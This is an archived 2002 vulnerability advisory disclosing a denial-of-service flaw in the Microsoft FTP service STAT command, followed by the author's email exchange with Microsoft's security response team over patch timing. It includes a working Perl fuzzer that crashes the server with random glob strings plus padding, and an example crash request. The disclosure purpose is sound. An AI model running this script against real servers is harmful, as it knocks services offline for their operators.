A copy of this document can be found online at: http://www.digitaloffense.net/msftpd/advisory.txt ----------------------------------------------------------------------------------------------- --[ Microsoft FTP Service STAT Globbing DoS Summary: The Microsoft FTP service is vulnerable to a Denial of Service attack in the STAT command. This DoS can be triggered by a remote attacker using either a valid user account or the anonymous account, which is enabled by default. Once exploited, all services running under the inetinfo.exe process will terminate. On IIS 5.0 and above, these services are supposed to restart, on IIS 4.0 the services must be restarted manually. This vulnerability appears to be impossible to exploit to gain a remote command shell. Versions other than 4.0 and 5.0 were not tested. Microsoft's advisory and a link to a patch is available online at: http://www.microsoft.com/technet/security/bulletin/MS02-018.asp Details: This vulnerability was discovered in November 2001 by a "fuzzer" script I wrote to audit FTP daemons for problems in the globbing functionality. This script created and sent random arguments to the "STAT" command consisting of various combinations of globbing characters. The original fuzzer had to be modified to use the Windows glob characters instead of the normal Unix set. Within 20 seconds the script had caused an access violation on a fully patched IIS server. An example request which can cause the crash: STAT ?*<240 x X> The crash occurs when a memchr call is passed a pointer which dereferences to a NULL. It may be possible to overwrite this memory with an arbitrary path and use this exploit to obtain a directory listing, but all attempts so far have failed and constantly restarting IIS and retrying was getting old. Scripts: (DoS PoC) http://www.digitaloffense.net/msftpd/msftp_dos.pl (Original "Fuzzer") http://www.digitaloffense.net/msftpd/msftp_fuzz.pl Credits: The following people helped in one form or another: * bind * rkl * halvar * tsnoop * ah / da (vulnhelp) History: Microsoft was notified of this vulnerability on December 2nd, 2001 through the SecurityFocus VulnHelp service. This vulnerability was made "public" in early February at the SANS Network Security Bootcamp conference in Monterey, CA. Complete details about this vulnerability as well as a example perl script have been available from the Digital Offense web site since then. This was due to a miscommunication about the availability of a patch between myself and the Microsoft Security team. This confusion came about because another reported vulnerability had been silently fixed as part of the SP2 Security Rollup 1 Update and this vulnerability was assumed to have been fixed as well. When I asked MS about this later, they responded saying that they would announce the other vulnerability (MS SMTP BDAT DoS) during the _NEXT_ security update and the fix for this one was being held back until the IIS developers released a jumbo patch for all currently reported problems. Considering that they were told 3 months previous that people were actively developing exploits for this issue and now a few hundred people had been informed about it at the conference, I found their unwillingness to release a hotfix absurd. The entire email exchange is listed below. --[ Email History [ The Original VulnHelp Email ] Microsoft FTP Daemon STAT Globbing Bug Date: Sun, 2 Dec 2001 20:04:28 -0600 From: H D Moore <hdmat_private> To: vulnhelpat_private The Microsoft FTP Service (5.0) crashes when a certain combination of glob strings are passed to the STAT command. I was unable to control the address of the crash, but since there is ample methods of placing user data into memory, Im sure someone will be able to exploit it given enough time. The perl code below should be sufficent to demonstrate the problem. As for a deadline on releasing a patch or making a public announcement, the sooner the better, there are already a few people developing exploits for it. --------------------------------------------------------------------- #!/usr/bin/perl -w ################## # cheezy perl to fuzz ftp globs # this one is designed for msftpd and STAT use Net::FTP; srand(time() + int($$)); $target = shift() || "127.0.0.1"; my $user = "anonymous"; my $pass = "crash\@burn.com"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!"; $ftp->login($user, $pass) || die "could not login: $!"; $ftp->cwd("/pub"); # crash it while (1) { $g = GetGlob(); print STDERR "Trying: $g\n"; $ret = $ftp->quot("STAT $g"); if ($ret !~ /^2/) { print "Error: FTP server returned an error response.\n"; exit(1); } } $ftp->quit; sub GetGlob { my $result; $len = 45; @globs = split(//, "?.\\*"); # build a string consisting of random sequencs # of the glob character array for (1 .. $len) { $result .= $globs[int(rand() * scalar(@globs))]; } # this provides some padding which is required # for the daemon to crash. my guess is that an # internal file name buffer is being overflowed # when a glob result string and a large char string # are combined, the length isnt checked. $result .= "A" x 200; return $result; } __END__ Only tested on Windows 2000 / MSFTPD 5.0 / Full Patches/ SP2: Event Type: Information Event Source: Application Popup Event Category: None Event ID: 26 Date: 12/2/2001 Time: 3:37:27 PM User: N/A Computer: SHATTERED Description: Application popup: inetinfo.exe - Application Error : The instruction at "0x6fc6a35c" referenced memory at "0x00000000". The memory could not be "written". Click on OK to terminate the program Click on CANCEL to debug the program [ The Initial Microsoft Response ] RE: [MSRC 961lt] Notification of Security Vulnerability Date: Mon, 3 Dec 2001 17:45:14 -0800 From: "Microsoft Security Response Center" <secureat_private> To: "Vulnerability Help" <vulnhelpat_private> Cc: <hdmooreat_private>, "Microsoft Security Response Center" <secureat_private> Hi - Thanks very much for your note. I'll start an investigation of this issue immediately, and will let you know what I find out. In the meantime, I've assigned tracking number MSRC 961 to this issue. If you would keep it in the subject line of future notes on the subject, it would make it easier to get status information for you. Regards Secureat_private [ The Confirmation from Microsoft ] RE: [MSRC 961lt] Notification of Security Vulnerability Date: Tue, 8 Jan 2002 08:55:38 -0800 From: "Microsoft Security Response Center" <secureat_private> To: <hdmooreat_private> Cc: "Microsoft Security Response Center" <secureat_private> Hi, I just wanted to update you and let you know that we have successfully reproduced this issue and plan on fixing it in the next rollup patch for IIS. We really appreciate you bringing this problem to our attention and will update you on the timetable for release. I am not sure yet where we are with the next IIS rollup but as soon as I learn I will update you again. Thanks for your email and for working with us. Kind regards, secureat_private [ My Response ] Re: [MSRC 961lt] Notification of Security Vulnerability Date: Tue, 15 Jan 2002 11:50:28 -0600 From: H D Moore <hdmat_private> To: "Microsoft Security Response Center" <secureat_private>, <hdmooreat_private> Cc: "Microsoft Security Response Center" <secureat_private> Will this patch also fix the SMTP BDAT crash reported a month previously? [ Their Response ] RE: [MSRC 961lt] Notification of Security Vulnerability Date: Tue, 15 Jan 2002 12:45:55 -0800 From: "Microsoft Security Response Center" <secureat_private> To: "H D Moore" <hdmat_private> Cc: "Microsoft Security Response Center" <secureat_private> Hi, Thanks for your note. The SMTP BDAT issue is separate and will be addressed in another patch. Regards, secureat_private [ My Response ] Re: [MSRC 961lt] Notification of Security Vulnerability Date: Fri, 15 Feb 2002 01:48:44 -0600 From: H D Moore <hdmat_private> To: "Microsoft Security Response Center" <secureat_private> Do you have an ETA on when the FTP issue will be fixed? The reason I ask is that I (mistakenly) assumed that the SP2SR1 patch already solved this problem and included the vulnerability in a presentation at a recent SANS conference. The reason for the confusion was simple, the SP2SR1 patch mentioned many fixes related to IIS services, and a quick glance showed that it addressed an issue with pattern-matching in the FTP service. Based on your previous message, I assumed this was the correct patch for it and let the cat out of the bag. The SP2SR1 patch did fix the SMTP BDAT bug, which I did verify before presenting the information. The materials are online, including a script to verify the existence of the vulnerability. I have no problem pulling the script off the site for the interim, but the attendees at the conference already have copies of the slides which contain enough information to exploit the bug... URL for the conference materials: http://www.digitaloffense.net/confs/bootcamp02/ Direct link to the slide addressing this bug: http://www.digitaloffense.net/confs/bootcamp02/jpeg/smash/Slide67.html On Tuesday 15 January 2002 02:45 pm, Microsoft Security Response Center wrote: > Hi, > > Thanks for your note. The SMTP BDAT issue is separate and will be > addressed in another patch. > > Regards, > > secureat_private > > -----Original Message----- > From: H D Moore [mailto:hdmat_private] > Sent: Tuesday, January 15, 2002 9:50 AM > To: Microsoft Security Response Center; hdmooreat_private > Cc: Microsoft Security Response Center > Subject: Re: [MSRC 961lt] Notification of Security Vulnerability > > > On Tuesday 08 January 2002 10:55 am, Microsoft Security Response Center wrote: > > Hi, > > > > I just wanted to update you and let you know that we have > > successfully reproduced this issue and plan on fixing it in the > > next rollup patch for IIS. We really appreciate you bringing this > > problem to our attention and will update you on the timetable for > > release. I am not sure yet where we are with the next IIS rollup > > but as soon as I learn I will update you again. > > > > Thanks for your email and for working with us. > > > > Kind regards, > > > > secureat_private > > Will this patch also fix the SMTP BDAT crash reported a month > previously? [ Their Response ] RE: [MSRC 961lt] Notification of Security Vulnerability Date: Mon, 18 Feb 2002 12:10:40 -0800 From: "Microsoft Security Response Center" <secureat_private> To: "H D Moore" <hdmat_private> Cc: "Microsoft Security Response Center" <secureat_private> Hi, I appreciate your note and your candor. I've forwarded this to the IIS folks to see if we can seriously speed up the rollup or if we need to work on an individual hotfix for your FTP issue MSRC 961. In regards to the BDAT issue, we replied to them on Nov 18. I enclose the correspondence for your review. Please let me know if there is some misunderstanding because we received the report from them and responded back to them. I was under the impression that they would handle getting the response back to you. In the second email, they note that they received our mail. Please let me know if we are missing something on our end. I am concerned about this. Regards, secureat_private -----Original Message----- From: H D Moore [mailto:hdmat_private] Sent: Monday, February 18, 2002 2:28 AM To: Microsoft Security Response Center Cc: Microsoft Security Response Center Subject: Re: [MSRC 961lt] Notification of Security Vulnerability On Friday 15 February 2002 10:28 am, Microsoft Security Response Center wrote: > Hi, > > The FTP issue is due to come out in an IIS rollup patch. We are > pushing the priority of this patch because we feel there are issues > that merit one sooner rather than later. I would look for it in the > coming month - even though I cannot guarantee it I feel fairly firm > on this. The IIS devs are really working with us and understand the > reasons we are pushing. The initial email I sent through vuln-help (early December) stated the vulnerability had become known to a handful of people, and that those people were actively developing exploits for it. The bug was determined to be non-exploitable (in a remote command shell granting way), but the DoS aspect is trivial to reproduce. It has been two months now and I am positive that there are people actually taking advantage of this in the wild. > In regards to presenting this issue at a conference, it seems to > me to be an honest mistake. Unless you feel that this > vulnerability is being exploited in the wild, I would still like > the IIS rollup to be the ship vehicle. Please let me know your > thoughts - I am sincerely interested. I am already getting a flood of email about details of this vulnerability and the availability of patches. So far, I have been recommending to just disable anonymous access and sit it out a month, but a hard release date would be preferable. I would feel much better about the whole situation if it wasn't for the way the SMTP BDAT bug was handled. A notification was sent through vuln-help on November 13th, 2001, yet I received no response on it until January 15th, 2002. To make matters worse, the SP2SR1 silently fixed this bug, with no mention of it in the online documentation, and no notification was ever sent to me stating that this patch addressed the bug. This bug will become public knowledge today. > Thanks for the update. Let me know if there is anything else we can > do. When will the IIS rollup patch be available? If there will be more than a week's delay, would it be possible to release a hotfix for it instead?
This archive was generated by hypermail 2b30 : Tue Apr 16 2002 - 20:08:32 PDT